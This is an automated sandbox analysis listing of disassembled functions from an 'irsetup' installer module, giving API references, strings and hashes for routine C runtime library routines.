Opcode Fuzzy Hash: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
Instruction Fuzzy Hash: 75616F7630078886FBB78F21D4453EA23A0E748BC8F1AC526EA4D467D6DF78CA49C351

Function 000000018002759C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002649C: _lock.LIBCMT ref: 00000001800264BF
Part of subcall function 000000018002649C: _errno.LIBCMT ref: 00000001800264D1

_errno.LIBCMT ref: 0000000180027624
_errno.LIBCMT ref: 000000018002762B
_errno.LIBCMT ref: 000000018002764D

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

_errno.LIBCMT ref: 0000000180027656
_errno.LIBCMT ref: 0000000180027660
_errno.LIBCMT ref: 000000018002766A
free.LIBCMT ref: 0000000180027693

Strings

COMSPEC, xrefs: 00000001800275A9
cmd.exe, xrefs: 0000000180027671

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lockfree
String ID: COMSPEC$cmd.exe
API String ID: 3602565165-2256226045
Opcode ID: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
Instruction ID: 68278e6952bb5676aa1c7e33abe437adcf0fbace9db24f0e263f771a66120287
Opcode Fuzzy Hash: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
Instruction Fuzzy Hash: 51318732304B8882EB93AF68A4857DE7391B78D3C4F558126F64D43A96DF34C60CC701

Function 00000001800218A4 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800218D2

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180021909

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
Instruction ID: ad6dcca9d861f50b33ce47824bcecdfeea55456dd60a8eb5268593a212cc83da
Opcode Fuzzy Hash: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
Instruction Fuzzy Hash: FC717031614A888AF7A7EB25E8517EA73A0B7A87C9F54C115FA49476D6DF38C60CCB00

Function 000000018002B938 Relevance: 15.1, APIs: 10, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002B961
_errno.LIBCMT ref: 000000018002B96A
__doserrno.LIBCMT ref: 000000018002B9BB
_errno.LIBCMT ref: 000000018002B9C2

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
Instruction ID: 40da67c960e1d4e2372dec5a0354c409265d61eb1e7225161d37e6ada3604ed7
Opcode Fuzzy Hash: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
Instruction Fuzzy Hash: 9C414832610A8886E7A3AF75A8427EE3755B7897E0F55C61ABB64477D3CE38C608C701

Function 0000000180027EB0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,0000000180027C40), ref: 0000000180027FA0
malloc.LIBCMT ref: 0000000180027FF9
GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,0000000180027C40), ref: 0000000180028035
free.LIBCMT ref: 0000000180028072
__ascii_stricmp.LIBCMT ref: 0000000180028109

Strings

am/pm, xrefs: 00000001800280FF
a/p, xrefs: 0000000180028161

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: FormatTime$__ascii_stricmpfreemalloc
String ID: a/p$am/pm
API String ID: 712559314-3206640213
Opcode ID: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
Instruction ID: cbe2ce431d5da5b9a7fad71b520a7281152b650febbd3d5ef3e97f1e640e6aa6
Opcode Fuzzy Hash: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
Instruction Fuzzy Hash: FBF1CD3A216698C6E7E7CF2484503ED67A1FB0DBC4F48D102FA8557A86DE398B5DE301

Function 000000018002F154 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
GetStdHandle.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F323
WriteFile.KERNEL32 ref: 000000018002F35D

Strings

Runtime Error!Program: , xrefs: 000000018002F1D6
Microsoft Visual C++ Runtime Library, xrefs: 000000018002F307
<program name unknown>, xrefs: 000000018002F221
..., xrefs: 000000018002F27A

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
Instruction ID: 74dce0a69e53e3faa34f58e3e1ea06bdb026180a8ddaf6cfecd4a031f9f463fb
Opcode Fuzzy Hash: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
Instruction Fuzzy Hash: 6651BD32200A4991FBB7D721A9957FA2395B78D7D8F44C52AB94982BD9CF38C30D8304

Function 0000000180030014 Relevance: 12.2, APIs: 8, Instructions: 192COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180030038

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180030064

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
Instruction ID: 4870327f923fffb19be7d4a8fd62541ede676502e6ed6a30b25f36a9472d912a
Opcode Fuzzy Hash: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
Instruction Fuzzy Hash: B2710772A1629C42F7FB9AB59835BEF2781A38D7C4F66C505BA4542AC2CF7C87088700

Function 000000018003A584 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5DE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5F0
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A63B
malloc.LIBCMT ref: 000000018003A6A0

Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A6CD
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A707
free.LIBCMT ref: 000000018003A71B
GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A731

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale$_errno$AllocByteCharErrorHeapLastMultiWidefreemalloc
String ID:
API String ID: 1309137116-0
Opcode ID: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
Instruction ID: 9a90928fadca3bfaea65b2354fbc267cb61a2ea66039529c6e1bfa5df3b8ce18
Opcode Fuzzy Hash: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
Instruction Fuzzy Hash: E651A63620868886F7A39F15AD413DB73A1F74D7E8F5A8615FA1A43BD4CF74CA498700

Function 000000018001E0D0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018002AF23
RtlLookupFunctionEntry.KERNEL32 ref: 000000018002AF42
RtlVirtualUnwind.KERNEL32 ref: 000000018002AF8E
IsDebuggerPresent.KERNEL32 ref: 000000018002B000
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002B018
UnhandledExceptionFilter.KERNEL32 ref: 000000018002B025
GetCurrentProcess.KERNEL32 ref: 000000018002B03E
TerminateProcess.KERNEL32 ref: 000000018002B04C

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
Instruction ID: fc12ada8a128d6f1d404ec32f716f7f9352f897c7c547437a0ea03871e7a68a8
Opcode Fuzzy Hash: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
Instruction Fuzzy Hash: 5631D535104F88C6E7A29B54F8843EA73A0F78D798F518116FA8D427A5DF7DC28D8704

Function 000000018002BB84 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
TerminateProcess.KERNEL32 ref: 000000018002BC9A

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
Instruction ID: c71b409959ccf73f4bc98b0901178c6aebfce8d2d3a295f4eecee81b12eb3b28
Opcode Fuzzy Hash: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
Instruction Fuzzy Hash: 4E312F72608B8982DB668B55F4443DBB3A4F799784F504115EACD43B99DF78C24CCB00

Function 00000001800347B0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800347DB

Part of subcall function 0000000180035298: _errno.LIBCMT ref: 00000001800352A1

free.LIBCMT ref: 00000001800348D2

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Part of subcall function 000000018002BEE8: _errno.LIBCMT ref: 000000018002BF00

___lc_codepage_func.LIBCMT ref: 000000018003485B

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentTerminateUnwindVirtual___lc_codepage_func_lockfree
String ID:
API String ID: 3702655603-0
Opcode ID: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
Instruction ID: 9471dd814442db4a536cca14816e46c77906279b8aeb0443e37adca9e85ad162
Opcode Fuzzy Hash: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
Instruction Fuzzy Hash: 83D1D33320468885E7B39F24E4917EB7795F38D7C0F42C116BA895B7A6CF38DA598B04

Function 0000000180035694 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800356C8

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

free.LIBCMT ref: 0000000180035904

Strings

cmd.exe, xrefs: 00000001800356A3

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errnofree
String ID: cmd.exe
API String ID: 3637258294-723907552
Opcode ID: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
Instruction ID: 6943f989181965795582f8eaac26820451e32651ef6446f151c0a8e5233c8295
Opcode Fuzzy Hash: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
Instruction Fuzzy Hash: 2C61273130468841FAE7E726A5117EF2391A78DBD0F55C936BE9947BE6CE38C7498700

Function 000000018002A29C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018002A2DE

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002A31C
_errno.LIBCMT ref: 000000018002A364

Strings

e+000, xrefs: 000000018002A3F6
-, xrefs: 000000018002A458
gfff, xrefs: 000000018002A483

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_getptd
String ID: -$e+000$gfff
API String ID: 2834218312-2620144452
Opcode ID: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
Instruction ID: a02038aa4d0300f9b50aee6095aae5c0a493ad474d81769f1ea6d53b9b79cc99
Opcode Fuzzy Hash: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
Instruction Fuzzy Hash: C26108326086C846F7A7DB2998413DE7791F38A7D8F18C216FB5847B85CE39C64C8700

Function 0000000180039FD4 Relevance: 10.6, APIs: 7, Instructions: 138COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003A01A
_errno.LIBCMT ref: 000000018003A088
_errno.LIBCMT ref: 000000018003A093
_errno.LIBCMT ref: 000000018003A0C7
WideCharToMultiByte.KERNEL32 ref: 000000018003A162
GetLastError.KERNEL32 ref: 000000018003A182
_errno.LIBCMT ref: 000000018003A1A8

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ByteCharErrorLastMultiWide
String ID:
API String ID: 3895584640-0
Opcode ID: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
Instruction ID: 0496a83d19119119c06eac124665b0f9d544e026b86ecaffa96e669938c9ee47
Opcode Fuzzy Hash: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
Instruction Fuzzy Hash: 185191326086C84AF7F79F65E8403EFB790F38A7D0F59C115B69943AC5CE68CA498B05

Function 000000018001ED40 Relevance: 10.6, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001ED71

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EDA9

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
Instruction ID: 37d480c48d6613522327dc8b80719ac5bc1941a2faed874dfcc6a4ccd8653334
Opcode Fuzzy Hash: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
Instruction Fuzzy Hash: 49418272710B8A83F7A69E35985279E3291B79D7C8F14C136BA054B686CF3CC618D700

Function 000000018002649C Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800264BF
_errno.LIBCMT ref: 00000001800264D1

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180026510

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_lock
String ID:
API String ID: 2175075375-0
Opcode ID: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
Instruction ID: 3db3c45d6a0b5cd1f105f54f4b3baf641d9be13896c0f45c2bade60435e83e15
Opcode Fuzzy Hash: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
Instruction Fuzzy Hash: 4931A432B10B9942FB97AE6595527DE6390AB8D7C0F44C525BF084BBCADF3CCA198700

Function 000000018002A600 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018002A655

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002A694
_errno.LIBCMT ref: 000000018002A6D7

Strings

0, xrefs: 000000018002A63B
gfffffff, xrefs: 000000018002A9C1

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_getptd
String ID: 0$gfffffff
API String ID: 2834218312-1804767287
Opcode ID: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
Instruction ID: b601890787595c58531ba7e6b687c0341182e1ca22c5763c78b8363e265dfe8c
Opcode Fuzzy Hash: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
Instruction Fuzzy Hash: 47B132726087CC47FBA38B2991453AE7BA5E75A7D0F14C222EB59077D2DE38CA59C300

Function 00000001800205D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800205FB

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002062C
